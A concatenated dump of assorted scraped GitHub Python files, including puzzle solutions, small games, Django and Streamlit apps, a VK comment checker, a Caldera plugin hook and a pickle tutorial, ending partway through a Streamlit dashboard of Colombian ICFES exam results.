label_clientes\n label_clientes = ctk.CTkLabel(\n master=frame_meio,\n text=\"Pedidos por clientes\",\n font=(\"Arial\", 15, \"bold\"),\n fg_color=cor_fundo\n )\n label_clientes.place(relx=0.74, rely=0.51, anchor=tkinter.CENTER)\n\n #!SECTION\n\n janela_pedido_venda.mainloop()\n#!SECTION\n#janela_pedido_venda_func(\"sub_janela_relatorio\", \"produtos_estoque\", \"text_relatorio\")\n","repo_name":"VinicioSales/controladorDeEstoques","sub_path":"config/instancias/janelas/janela_pedido_venda.py","file_name":"janela_pedido_venda.py","file_ext":"py","file_size_in_byte":38521,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22566292922","text":"import heapq\nfrom collections import defaultdict\n\nfrom rich import print\n\n\ndef get_input():\n input = {}\n with open(\"input.txt\") as input_txt:\n for x, line in enumerate(input_txt):\n for i, n in enumerate(line.strip()):\n input[(i, x)] = int(n)\n return input\n\n\ndef dijkstra(grid):\n destination = defaultdict(lambda: float('inf'))\n nodes = [(0, (0, 0))]\n while len(nodes) > 0:\n point, (i, n) = heapq.heappop(nodes)\n for node in ((i, n + 1), (i, n - 1), (i + 1, n), (i - 1, n)):\n if node not in grid:\n continue\n\n points = point + grid[node]\n if points < destination[node]:\n destination[node] = points\n heapq.heappush(nodes, (points, node))\n\n return destination[max(destination.keys())]\n\n\ndef part_1(input):\n return dijkstra(input)\n\n\ndef part_2(input):\n width, height = max(input.keys())\n height += 1\n width += 1\n\n map = input.copy()\n for first in range(5):\n for second in range(5):\n total = first + second\n if total == 0:\n continue\n\n for (i, n), points in input.items():\n value = points + total\n if value > 9:\n value -= 9\n map[(i + (second * width), n + (first * height))] = value\n\n return dijkstra(map)\n\n\nif __name__ == \"__main__\":\n input = get_input()\n\n part_1 = part_1(input)\n print(f\"Puzzle Part 1: {part_1}\")\n\n part_2 = part_2(input)\n print(f\"Puzzle Part 2: {part_2}\")\n","repo_name":"promarcel/advent-of-code-2021","sub_path":"15/chiton.py","file_name":"chiton.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74524388328","text":"import re\r\nimport logging\r\n\r\nfrom config import vk_user\r\n\r\n\r\nasync def get_comment(id, url):\r\n ids = url.split('wall')[1].split('_')\r\n get_coms = await vk_user.api.wall.get_comments(owner_id=ids[0], post_id=ids[1], need_likes=0, sort='desc')\r\n comments = get_coms.items\r\n com = False\r\n for i in comments:\r\n if i.from_id == id:\r\n com = True\r\n words = [j for j in re.findall(r'\\w+', i.text) if len(j) > 3]\r\n if len(words) > 5:\r\n return True, i.text\r\n if com:\r\n return False, 'Комментарий слишком короткий'\r\n return False, 'Комментарий не найден'\r\n\r\n\r\nasync def get_post(url):\r\n wall = None\r\n video = False\r\n try:\r\n wall = url.split('wall')\r\n if len(wall) != 2:\r\n raise Exception(f'Lenght of list wall (wall) is not 2, but {len(wall)}')\r\n \r\n if wall[0][-1] == '=':\r\n url = 'https://vk.com/wall'+wall[1]\r\n \r\n id = url[-1]\r\n int(id)\r\n except Exception as e:\r\n logging.error(e)\r\n\r\n try:\r\n if url[-4:] == '?c=0':\r\n url = url[:-4]\r\n \r\n wall = url.split('clip')\r\n if len(wall) != 2:\r\n raise Exception(f'Lenght of list wall (clip) is not 2, but {len(wall)}')\r\n \r\n if wall[0][-1] == '=':\r\n url = 'https://vk.com/clip'+wall[1]\r\n \r\n id = url[-1]\r\n int(id)\r\n except Exception as e:\r\n logging.error(e)\r\n return False, 'Неправильная ссылка на пост или же пост не найден'\r\n \r\n return False, 'Допускаются ссылки на посты, начинающиеся с \"wall\"'\r\n\r\n try:\r\n post = await vk_user.api.wall.get_by_id(posts=[wall[1]])\r\n type = 'group'\r\n author = post[0].from_id\r\n\r\n if author > 0:\r\n type = 'user'\r\n \r\n return True, type\r\n except Exception as e:\r\n logging.error(e)\r\n return False, 'Пост не найден или же страница с постом закрытая'","repo_name":"DragonsCode/vk-comments-and-likes","sub_path":"functions/comments.py","file_name":"comments.py","file_ext":"py","file_size_in_byte":2210,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26438671700","text":"#weapon class\nclass Bomb(object):\n def __init__(self, timer, playernum, bombradius):\n self.timer = timer\n #records down number by player\n self.playernum = playernum\n self.bombradius = bombradius\n self.weaponID = 0\n\n def countDown(self):\n if self.timer > 0:\n self.timer -= 1\n\n\nclass Explosion(object):\n def __init__(self, centerRow, centerCol, playernum, bombRadius):\n self.centerRow = centerRow\n self.centerCol = centerCol\n #list of coordinates containing the radius\n self.radius = []\n self.timer = 2\n #controls whose explosion belongs to whom\n self.playernum = playernum\n self.bombRadius = bombRadius\n self.bombdcoordinate = [(0,0)]\n\n def createBombchangeRowCol(self):\n baseRadius = [(0,1), (1,0), (-1,0), (0, -1)]\n for i in range(1, self.bombRadius + 1):\n for row, col in baseRadius:\n self.bombdcoordinate.append((row*i, col*i))\n","repo_name":"Icyviolet23/Bomb_It_112_TP","sub_path":"weapon.py","file_name":"weapon.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"2556413229","text":"from django.conf.urls.defaults import patterns, include, url\nfrom chihuo.views import main_view\nfrom django.conf import settings\n\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n # Examples:\n # url(r'^$', 'chihuo.views.home', name='home'),\n # url(r'^chihuo/', include('chihuo.foo.urls')),\n\n # Uncomment the admin/doc line below to enable admin documentation:\n # url(r'^admin/doc/', include('django.contrib.admindocs.urls')),\n\turl(r'^$', 'chihuo.views.main_view'),\n\turl(r'^join-us/$', 'chihuo.views.join_us'),\n\turl(r'^category/(\\d+)/$', 'chihuo.views.category_view'),\n\turl(r'^login/$', 'chihuo.people.views.login'),\n\turl(r'^logout/$', 'chihuo.people.views.logout'),\n\turl(r'^register/$', 'chihuo.people.views.register'),\n\turl(r'^rsvp/$', 'chihuo.rsvp.views.index'),\n\turl(r'^rsvp/join/$', 'chihuo.rsvp.views.join'),\n\turl(r'^rsvp/create/$', 'chihuo.rsvp.views.create_event'),\n # Uncomment the next line to enable the admin:\n url(r'^admin/', include(admin.site.urls)),\n)\n\nif settings.DEBUG:\n urlpatterns += patterns('',\n (r'^media/(?P.*)$', 'django.views.static.serve', {'document_root': settings.MEDIA_ROOT}),\n )","repo_name":"yeeppe/chihuo","sub_path":"urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"34257977106","text":"# 정확도 테스트\n# 테스트 1 〉\t통과 (0.21ms, 10.4MB)\n# 테스트 2 〉\t통과 (0.92ms, 10.4MB)\n# 테스트 3 〉\t통과 (0.21ms, 10.4MB)\n# 테스트 4 〉\t통과 (0.37ms, 10.5MB)\n# 테스트 5 〉\t통과 (0.21ms, 10.5MB)\n# 테스트 6 〉\t통과 (0.21ms, 10.5MB)\n# 테스트 7 〉\t통과 (0.21ms, 10.4MB)\n# 테스트 8 〉\t통과 (0.21ms, 10.3MB)\n# 테스트 9 〉\t통과 (0.10ms, 10.5MB)\n# 테스트 10 〉\t통과 (0.03ms, 10.5MB)\n\n# 효율성 테스트\n# 테스트 1 〉\t통과 (114.78ms, 10.7MB)\n# 테스트 2 〉\t통과 (110.47ms, 10.7MB)\n# 테스트 3 〉\t통과 (112.55ms, 10.7MB)\n# 테스트 4 〉\t통과 (115.92ms, 10.7MB)\n# 테스트 5 〉\t통과 (124.00ms, 10.8MB)\n# 테스트 6 〉\t통과 (112.67ms, 10.8MB)\n# 테스트 7 〉\t통과 (110.01ms, 10.7MB)\n# 테스트 8 〉\t통과 (124.12ms, 10.7MB)\n\n\ndef solution(arr):\n\n # 숫자와 연산자를 분리\n d = [int(item) for item in arr if item.isdigit()]\n op = [item for item in arr if not item.isdigit()]\n\n lend = len(d)\n\n # 최댓값과 최솟값을 담은 dp를 활용\n # dp[i][j]는 d의 i원소부터 j원소까지의 연산의 최댓값/최솟값을 적을 것임\n max_dp = [[-10 ** 9] * len(d) for _ in range(lend)]\n min_dp = [[10 ** 9] * len(d) for _ in range(lend)]\n\n # dp[i][i]는 연산 없이 i원소 자신\n for i in range(lend):\n max_dp[i][i] = d[i]\n min_dp[i][i] = d[i]\n\n\n for diag in range(1, lend):\n for i in range(0, lend - diag):\n j = i + diag\n\n for k in range(i, j):\n M = 0\n m = 0\n if op[k] == \"+\": # 더하기일때 최댓값과 최솟값!\n M = max_dp[i][k] + max_dp[k + 1][j]\n m = min_dp[i][k] + min_dp[k + 1][j]\n else: # 빼기일때 최댓값과 최솟값!\n M = max_dp[i][k] - min_dp[k + 1][j]\n m = min_dp[i][k] - max_dp[k + 1][j]\n\n # 최대, 최소 갱신\n max_dp[i][j] = max(max_dp[i][j], M)\n min_dp[i][j] = min(min_dp[i][j], m)\n\n return max_dp[0][-1]","repo_name":"leehyeonmin34/algorithm","sub_path":"src/programmers/level4/Programmers_사칙연산.py","file_name":"Programmers_사칙연산.py","file_ext":"py","file_size_in_byte":2107,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12472944967","text":"q = int(input())\nabcList = []\nfor i in range(q):\n abcList.append([int(x) for x in input().split()])\n\ndef fer(a, b, c):\n def f(x):\n return x ** 3 + a * x ** 2 + b * x - c\n def fp(x):\n return 3 * x ** 2 + 2 * a * x + b\n return f, fp \n\ndef newton(f, fp, e=1e-6):\n x0 = 0\n x_n = x0 - f(x0) / fp(x0)\n while abs(x_n - x0) > e:\n x0 = x_n\n x_n = x0 - f(x0) / fp(x0)\n return x_n\n\nfor abc in abcList:\n f, fp = fer(*abc)\n print(newton(f=f, fp=fp))","repo_name":"wzdlc1996/PhyGO","sub_path":"JobSeeking/leonard/Research/problem03.py","file_name":"problem03.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"2250710871","text":"# game.py\n# Authors:\n# Alastair, Lucian\n# This file should run your game.\n#\n# You can (and should) create other files and modules to import them\n# here as needed.\n\nfrom quest.game import QuestGame\nfrom quest.map import TiledMap\nfrom quest.sprite import Background, Wall, NPC, QuestSprite, Player\nfrom quest.helpers import scale, resolve_resource_path\nfrom quest.strategy import RandomWalk\nimport arcade\nimport os\nfrom pathlib import Path\nimport time\n\n\nclass Maze(QuestGame):\n \"\"\"A very simple subclass of :py:class:`QuestGame`.\n\n To run this example::\n\n $ python -m quest.examples.island\n\n :py:class:`IslandAdventure` shows off the basic features of the Quest\n framework, loading a map and letting the player explore it.\n After you play it, check out the sorce code by clicking on \"source\" in the\n blue bar just above.\n \"\"\"\n\n player_sprite_image = (\"images/DungeonTiles/frames/knight_m_idle_anim_f1.png\")\n screen_width = 300\n screen_height = 300\n left_viewport_margin = 150\n right_viewport_margin = 150\n bottom_viewport_margin = 150\n top_viewport_margin = 150\n player_initial_x = 340\n player_initial_y = 250\n player_speed = 3\n health = 100\n\n\n def reduce_health(self):\n self.health = self.health - 20\n if self.health <= 0:\n print(\"you died\")\n self.player.center_x = self.player_initial_x\n self.player.center_y = self.player_initial_y\n self.health = 100\n\n\n\n\n def setup_maps(self):\n \"\"\"Sets up the map.\n\n Uses a :py:class:`TiledMap` to load the map from a ``.tmx`` file,\n created using :doc:`Tiled `.\n \"\"\"\n super().setup_maps()\n sprite_classes = {\n \"walls\": Wall,\n \"play\": Background,\n \"exit\": Background,\n }\n island_map = TiledMap((\"images/qwerty_game_1.tmx\"), sprite_classes)\n self.add_map(island_map)\n\n\n def setup_walls(self):\n \"\"\"Assigns sprites to `self.wall_list`. These sprites will function as walls, blocking\n the player from passing through them.\n \"\"\"\n self.wall_list = self.get_current_map().get_layer_by_name(\"walls\").sprite_list\n\n def instructions(self):\n print(\" \")\n print(\"W,A,S,D to move, SPACE to attack\")\n\n\n def setup_npcs(self):\n npc_data = []\n for i in range(1):\n npc_data.append([mob, \"images/DungeonTiles/frames/big_demon_idle_anim_f3.png\", 0.8, 500, 140])\n npc_data.append([mob, \"images/DungeonTiles/frames/big_demon_idle_anim_f3.png\", 0.8, 100, 140])\n self.npc_list = arcade.SpriteList()\n for sprite_class, image, scale, x, y in npc_data:\n sprite = sprite_class(image, scale)\n sprite.center_x = x\n sprite.center_y = y\n self.npc_list.append(sprite)\n\n monster = self.npc_list[0]\n walk = RandomWalk(0.03)\n monster.strategy = walk\n\n monster2 = self.npc_list[1]\n walk = RandomWalk(0.03)\n monster2.strategy = walk\n\nclass mob(NPC):\n repel_distance = 20\n hit = False\n hit_count= 0\n\n def on_collision(self, sprite, game):\n if isinstance(sprite, Player):\n self.repel(sprite)\n game.reduce_health()\n self.hit = True\n print(game.health)\n\n def on_update(self,game):\n if self.hit == True and self.hit_count <150:\n self.stop()\n self.hit_count +=1\n elif self.strategy:\n self.set_course(self.strategy.choose_course(self, game))\n self.hit_count = 0\n self.hit = False\n\n\n def repel(self, sprite):\n \"Backs the sprite away from self\"\n away = (self.center_x - sprite.center_x, self.center_y - sprite.center_y)\n away_x, away_y = scale(away, self.repel_distance)\n sprite.center_x = sprite.center_x - away_x\n sprite.center_y = sprite.center_y - away_y\n sprite.stop()\n\nif __name__ == '__main__':\n game = Maze()\n game.instructions()\n game.run()\n","repo_name":"the-isf-academy/project-game-qwerty","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":4061,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38582458768","text":"from app.utility.base_world import BaseWorld\n\nfrom plugins.ot.app.ot_gui import OTGUI\nfrom plugins.ot.app.ot_api import OTAPI\n\nname = 'OT'\ndescription = 'The OT plugin for Caldera provides adversary emulation abilities specific to Operational Technology.'\naddress = '/plugin/ot/gui'\naccess = BaseWorld.Access.RED\n\n\nasync def enable(services):\n app = services.get('app_svc').application\n ot_gui = OTGUI(services, name=name, description=description)\n\n app.router.add_static('/ot', 'plugins/ot/static/', append_version=True)\n app.router.add_route('GET', '/plugin/ot/gui', ot_gui.splash)\n\n ot_api = OTAPI(services)\n # Add API routes here\n app.router.add_route('POST', '/plugin/ot/mirror', ot_api.mirror)\n\n","repo_name":"activeshadow/caldera-ot","sub_path":"hook.py","file_name":"hook.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23044887064","text":"import streamlit as st\nimport pandas as pd\nimport plotly.graph_objects as go\nimport plotly.express as px\n\nimport sys\n\nimport hub_clustering.params as p\nimport hub_clustering.utils as f\nimport hub_clustering.hubstation_sizer as sizer\n\n\nimport hub_clustering.streamlit_function as l\n\nst.header(\"Station locations to meet 100% of demand\")\n\nst.write(\"\"\"This page presents the **distribution of H2 stations** according to the scenario considered (optimistic, moderate or conservative) and the year (2030 or 2040).\n\nThe parameters that allowed us to estimate the demand and therefore the location and size of the stations can be modified, in particular because they are likely to evolve in the next 10 or 20 years.\n\"\"\",\n unsafe_allow_html=True)\n\n\n# Setting default values\n#scenario = \"moderate\"\nheight = 6\nreplacement_rate = 15\ntruck_capacity = 100\n\n# Converting scenario strings to index\nscenario_indexes = {\"optimistic\": 0, \"moderate\": 1, \"conservative\": 2}\n\n\nscenario = st.radio(\"Scenario:\",\n ('optimistic', 'moderate', 'conservative'),\n 1,\n horizontal=True)\n\n\ncol1, col2 = st.columns(2)\n#year = \"2030\" # Setting default\nyear = st.radio(\"Year:\",\n ('2030', '2040'),\n 0,\n horizontal=True)\n\nwith st.sidebar:\n height = st.slider(\n \"Select average height (in meters) for a warehouse\", 5, 15, value=height\n )\n replacement_rate = st.slider(\n \"Select average inventory turnover time (in days)\",\n 7,\n 25,\n value=replacement_rate,\n )\n truck_capacity = st.slider(\n \"Select average truck capacity (in cubic meters) for a H2 truck\",\n 70,\n 200,\n value=truck_capacity,\n )\n\n\n# Loading Road Stations data\nroad_data = l.load_and_prepare_location()\n\nfrequency, affluence = p.ROAD_HUB_THRESHOLDS[year][scenario_indexes[scenario]]\n_, road_stations = l.intermediateStations(road_data, frequency, affluence)\nroad_stations = road_stations[road_stations.is_stationable == 1]\n\nnumber_of_trucks = p.NUMBER_OF_TRUCKS[year]\nhydrogene_kg_served_by_hubs = p.HYDROGENE_SERVED_BY_HUBS[year]\nroad_profitability = l.get_profitability_info(\n road_stations, number_of_trucks, hydrogene_kg_served_by_hubs\n)\n\nto_map_roads = pd.merge(road_stations, road_profitability, on=\"route\", how=\"left\")\nto_map_roads.rename({\"latD\": \"latitude\", \"lonD\": \"longitude\"}, axis=1, inplace=True)\n\n\n# Loading Hub Stations data\n\nhub_data = f.load_data()\nprint(scenario)\ndf = f.filter_dataset(hub_data, scenario=scenario, year=year)\nfinal_dataset, centroids_df = f.run_kmeans(df, scenario=scenario, year=year)\n\ncentroids_df.reset_index(inplace=True)\ncentroids_df.columns = [\"centroid_id\", \"region\", \"latitude\", \"longitude\"]\ncentroids_df.sort_values(by=[\"region\", \"centroid_id\"])\n\nh2_kg_demand = (\n df[\"Surface totale\"]\n .pipe(sizer.compute_total_volume, height=height)\n .pipe(sizer.compute_daily_stock_volume_gone, replacement_rate=replacement_rate)\n .pipe(sizer.compute_daily_nb_trucks, truck_capacity=truck_capacity)\n .pipe(sizer.compute_daily_nb_h2_trucks)\n .pipe(sizer.compute_daily_h2_demand)\n)\n\nfinal_dataset[\"h2_kg_demand\"] = h2_kg_demand\nfinal_dataset[\"surface_totale\"] = df[\"Surface totale\"]\n\n\ndf_stations_type = final_dataset.groupby(\n [\"Région d'implantation\", \"centroid\"], as_index=False\n).agg({\"centroid_coord\": \"first\", \"h2_kg_demand\": \"sum\", \"surface_totale\": \"sum\"})\n\n\ndf_stations_type[\"stations_type\"] = df_stations_type[\"h2_kg_demand\"].apply(\n sizer.stations_type\n)\n\ndf_stations_type = df_stations_type[\n [\"h2_kg_demand\", \"stations_type\", \"surface_totale\"]\n].merge(centroids_df, left_index=True, right_on=\"centroid_id\")\n\n\ndf_stations_type[\"station_utilization_rate\"] = df_stations_type.apply(\n lambda x: sizer.station_utilization_rate(x.h2_kg_demand, x.stations_type), axis=1\n)\n\ndf_stations_type[\"plotly_station_utilization_rate\"] = df_stations_type.apply(\n lambda x: sizer.plotly_station_utilization_rate(x.h2_kg_demand, x.stations_type),\n axis=1,\n)\n\n\n# Merging both datasets\ndf_stations_type.rename({\"stations_type\": \"size_station\"}, axis=1, inplace=True)\nhubs_to_plot = df_stations_type[[\"latitude\", \"longitude\", \"size_station\"]]\nhubs_to_plot[\"type\"] = \"hub\"\n\nroads_to_plot = to_map_roads[[\"latitude\", \"longitude\", \"size_station\"]]\nroads_to_plot[\"type\"] = \"road\"\n\ndf_to_plot = pd.concat([hubs_to_plot, roads_to_plot])\ndf_to_plot.loc[df_to_plot['size_station']=='small', 'size_of_marker'] = 1\ndf_to_plot.loc[df_to_plot['size_station']=='medium', 'size_of_marker'] = 5\ndf_to_plot.loc[df_to_plot['size_station']=='large', 'size_of_marker'] = 10\n\n\ndef visualize_on_map_contrast(df_to_plot, contrast=\"type\"):\n if contrast==\"type\":\n colors={\"hub\": \"green\", \"road\": \"blue\"}\n else:\n colors={\"small\": \"blue\", \"medium\": \"green\", \"large\": \"orange\"}\n \n fig = px.scatter_mapbox(\n df_to_plot,\n lat=\"latitude\",\n lon=\"longitude\",\n zoom=5,\n height=800,\n width=800,\n size='size_of_marker',\n size_max=12,\n hover_name='type',\n color=contrast,\n color_discrete_map=colors,\n )\n fig.update_layout(mapbox_style=\"open-street-map\")\n fig.update_layout(margin={\"r\": 0, \"t\": 0, \"l\": 0, \"b\": 0})\n return fig\n\n\n# Mapping\n\nst.subheader(\"Stations according to type (hubs vs roads)\")\ncol1_type, col2_type, col3_type = st.columns(3)\nhubs = df_to_plot[df_to_plot.type == \"hub\"].shape[0]\nroads = df_to_plot[df_to_plot.type == \"road\"].shape[0]\ncol1_type.metric(\"Hub stations\", hubs)\ncol2_type.metric(\"Road stations\", roads)\ncol3_type.metric(\"**Total number of stations**\", hubs+roads)\nst.plotly_chart(visualize_on_map_contrast(df_to_plot))\n\n\n# Mapping\n\nst.subheader(\"Stations according to size (small, medium, large)\")\ncol1_size, col2_size, col3_size, col4_size = st.columns(4)\nsmall = df_to_plot[df_to_plot.size_station == \"small\"].shape[0]\nmedium = df_to_plot[df_to_plot.size_station == \"medium\"].shape[0]\nlarge = df_to_plot[df_to_plot.size_station == \"large\"].shape[0]\ncol1_size.metric(\"Small stations\", small)\ncol2_size.metric(\"Medium stations\", medium)\ncol3_size.metric(\"Large stations\", large)\ncol4_size.metric(\"**Total number of stations**\", small+medium+large)\nst.plotly_chart(visualize_on_map_contrast(df_to_plot, contrast=\"size_station\"))\n\n","repo_name":"Pointing9212/airliquide","sub_path":"webapp_final/pages/2_Station_Locations.py","file_name":"2_Station_Locations.py","file_ext":"py","file_size_in_byte":6325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29179569194","text":"from multiprocessing import Process\nimport os\nimport pandas\n\nip_list = [\"192.168.1.205\", \"192.168.1.236\", \"192.168.1.219\", \"192.168.1.198\",\n \"192.168.1.194\", \"192.168.1.151\", \"192.168.1.247\", \"192.168.1.130\", \n \"192.168.1.187\", \"192.168.1.51\", \"192.168.1.33\", \"192.168.1.211\"]\n\ndef job(ip, recipe_name, detect_region_dilation, detect_region_low_threshold, \n detect_region_high_threshold, complete_region_dilation, \n complete_region_low_threshold, complete_region_high_threshold, \n complete_ratio, second_detect_region_dilation,\n second_detect_region_low_threshold, \n second_detect_region_high_threshold):\n \n print(\"start process {} {}\".format(ip, recipe_name))\n os.system(\"python detect_region_job.py {} {} {} {} {} {} {} {} {} {} {} {}\".format(ip, recipe_name,\n detect_region_dilation, \n detect_region_low_threshold, \n detect_region_high_threshold, \n complete_region_dilation, \n complete_region_low_threshold, \n complete_region_high_threshold, \n complete_ratio,\n second_detect_region_dilation,\n second_detect_region_low_threshold,\n second_detect_region_high_threshold))\n\n\ndef main():\n recipe_name = input(\"please input recipe name: \")\n recipe_parameter = pandas.read_csv(\"{}/parameter.csv\".format(recipe_name), index_col = 0)\n for ip in ip_list:\n process = Process(target = job, args=(ip, recipe_name, recipe_parameter.loc[ip, \"detect_region_dilation\"], \n recipe_parameter.loc[ip, \"detect_region_low_threshold\"], \n recipe_parameter.loc[ip, \"detect_region_high_threshold\"],\n recipe_parameter.loc[ip, \"complete_region_dilation\"],\n recipe_parameter.loc[ip, \"complete_region_low_threshold\"],\n recipe_parameter.loc[ip, \"complete_region_high_threshold\"],\n recipe_parameter.loc[ip, \"complete_ratio\"],\n recipe_parameter.loc[ip, \"second_detect_region_dilation\"],\n recipe_parameter.loc[ip, \"second_detect_region_low_threshold\"],\n recipe_parameter.loc[ip, \"second_detect_region_high_threshold\"]))\n process.start()\n \nif __name__ == \"__main__\":\n main()","repo_name":"jerrywang8472/code_backup","sub_path":"cut_image/detect_region_main.py","file_name":"detect_region_main.py","file_ext":"py","file_size_in_byte":3302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12164826876","text":"\nimport pickle\n\n# a = (1,2,3)\n# ==============\n# print(a) # (1, 2, 3)\n# b = pickle.dumps(a)\n# print(b) #b'\\x80\\x04\\x95\\t\\x00\\x00\\x00\\x00\\x00\\x00\\x00K\\x01K\\x02K\\x03\\x87\\x94.'\n# c = pickle.loads(b)\n# print(a == c) # True\n# print(type(c)) # \n# print(c) # (1, 2, 3)\n# =============================\n# a = (1,2,3)\n# with open(\"text.bin\", \"wb\") as file:\n# pickle.dump(a, file)\n# with open(\"text.bin\", \"rb\") as file:\n# b = pickle.load(file)\n# print(b)\n\n# =====================\n\nclass Character:\n def __init__(self, name):\n self.name = name\n\nchar = Character(\"Jack\")\n# ser = pickle.dumps(char)\n# print(ser)\n# des = pickle.loads(ser)\n# print(des) # <__main__.Character object at 0x7f7bb3f23090>\n# print(des.name) # Jack\n# print(type(des)) # \n\nwith open(\"text.bin\", \"wb\") as file:\n pickle.dump(char, file)","repo_name":"SiracencoSerghei/my-python-tasks","sub_path":"Serializing Python Objects/with_pickle_2.py","file_name":"with_pickle_2.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7393466386","text":"import os\nfrom dotenv import load_dotenv, find_dotenv\n\nif not find_dotenv():\n exit(\"Переменные окружения не загружены т.к отсутствует файл .env\")\nelse:\n load_dotenv()\n\nBOT_TOKEN = os.getenv(\"BOT_TOKEN\")\nADMIN_ID = os.getenv(\"ADMIN_ID\")\nDEFAULT_COMMANDS = (\n (\"help\", \"Правила подготовки видео\"),\n)\n","repo_name":"neenael/circle_bot","sub_path":"config_data/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17167828868","text":"import streamlit as st\nimport pandas as pd\nimport plotly.express as px\n\nst.set_page_config(page_title=\"Fase 4 Lab 2 JECR\", layout=\"wide\")\n\n#### FUNCIONES ###\n@st.cache()\ndef plot_heatmap(df: pd.DataFrame, x: str, y: str):\n data_heatmap = (\n df.reset_index()[[x, y, \"index\"]]\n .groupby([x, y])\n .count()\n .reset_index()\n .pivot(x, y, \"index\")\n .fillna(0)\n )\n fig = px.imshow(\n data_heatmap,\n color_continuous_scale=\"Blues\",\n aspect=\"auto\",\n title=f\"Heatmap {x} vs {y}\",\n )\n fig.update_traces(\n hovertemplate=\"\"\n + y\n + \": %{x}
        \"\n + x\n + \": %{y}
        Conteo interacción variables: %{z}\"\n )\n return fig\n\n\n@st.cache()\ndef cargar_datos():\n data20201 = pd.read_csv(\"Resultados__nicos_Saber_11_plain_20201.csv\")\n data20211 = pd.read_csv(\"Resultados__nicos_Saber_11_plain_20211.csv\")\n # Se concatenan los dos periodos de los datos\n data = pd.concat([data20201, data20211])\n\n data[\"PUNT_GLOBAL_CAT\"] = data[\"PUNT_GLOBAL\"].apply(\n lambda x: \"BAJO (<=294)\" if x <= 294 else \"ALTO (>294)\"\n )\n # Se presentan los datos seleccionados\n return data\n\n\ndata = cargar_datos()\n\nst.sidebar.markdown(\"# Dashboard de exploración\")\n\nst.sidebar.image(\"logo.jpg\", use_column_width=True)\nst.sidebar.markdown(\n \"## Fase 4 Entrega Laboratorio 2 de Jorge Esteban Caballero Rodríguez\"\n)\n\nst.sidebar.markdown(\n \"### Datos ICFES periodos 20201 y 20211, obtenidos de \"\n \"[https://www.datos.gov.co/Educaci-n/Resultados-nicos-Saber-11/kgxf-xxbe/data](https://www.datos.gov.co/Educaci-n/Resultados-nicos-Saber-11/kgxf-xxbe/data)\"\n)\nst.sidebar.markdown(\n \"\"\"A su derecha, tendrá una serie de gráficos con sus controladores\nen la parte superior de los mismos.\n\nSe han elegido 3 gráficos para explorar los datos:\n\n- Un scatterplot, para comparar los puntajes entre si.\n- Un countplot, para ver la distribución de los niveles de las variables categóricas.\n - Este gráfico además, separa cada nivel según su nivel de desempeño. \n- Un heatmap, para comparar las variables del modelo con la clasificación hecha del puntaje.\n - Este se usó en el proyecto para la interpretación del modelo de Clasificación.\n\n\nDados los resultados obtenidos en la exploración y modelado, un puntaje se considera bajo si es menor o igual \na 294 (de 500)\n\n\nEn cambio, los puntajes altos serán los superiores a 294\"\"\"\n)\n\ncol1, col2 = st.columns(2)\ncol1.markdown(\n \"\"\"## Scatterplot:\nComparación entre las variables asociadas al puntaje\"\"\"\n)\ncol2.markdown(\n \"\"\"## Countplot:\nComparación entre los conteos de las diferentes variables categóricas y el nivel de puntaje obtenido.\n\n \n **El nivel de puntaje es \"BAJO\" para puntajes de 294 o menos, ya alto para puntajes mayores a 294**\"\"\"\n)\nvariables_numericas = [\n \"PUNT_INGLES\",\n \"PUNT_MATEMATICAS\",\n \"PUNT_SOCIALES_CIUDADANAS\",\n \"PUNT_C_NATURALES\",\n \"PUNT_LECTURA_CRITICA\",\n \"PUNT_GLOBAL\",\n]\nscatterx = col1.selectbox(\n label=\"Elija una de las variables numéricas para el eje X del Scatterplot\",\n options=variables_numericas,\n)\nopciones_scatter2 = variables_numericas.copy()\nopciones_scatter2.pop(variables_numericas.index(scatterx))\nscattery = col1.selectbox(\n label=\"Elija una de las variables numéricas para el eje Y del Scatterplot\",\n options=opciones_scatter2,\n)\n\n\nfig = px.scatter(\n data,\n x=scatterx,\n y=scattery,\n)\nfig.update_traces(\n marker=dict(size=7, line=dict(width=2, color=\"DarkSlateGrey\")),\n selector=dict(mode=\"markers\"),\n opacity=0.69,\n)\ncol1.plotly_chart(fig, use_container_width=True)\n\n\nhistx = col2.selectbox(\n label=\"Elije la variable categórica para observar su conteo y distribución entre puntajes ALTO y BAJO\",\n options=[\n \"COLE_BILINGUE\",\n \"COLE_AREA_UBICACION\",\n \"COLE_CALENDARIO\",\n \"COLE_CARACTER\",\n \"COLE_GENERO\",\n \"COLE_JORNADA\",\n \"COLE_NATURALEZA\",\n \"COLE_DEPTO_UBICACION\",\n \"ESTU_GENERO\",\n \"FAMI_CUARTOSHOGAR\",\n \"FAMI_EDUCACIONMADRE\",\n \"FAMI_EDUCACIONPADRE\",\n \"FAMI_ESTRATOVIVIENDA\",\n \"FAMI_PERSONASHOGAR\",\n \"FAMI_TIENEAUTOMOVIL\",\n 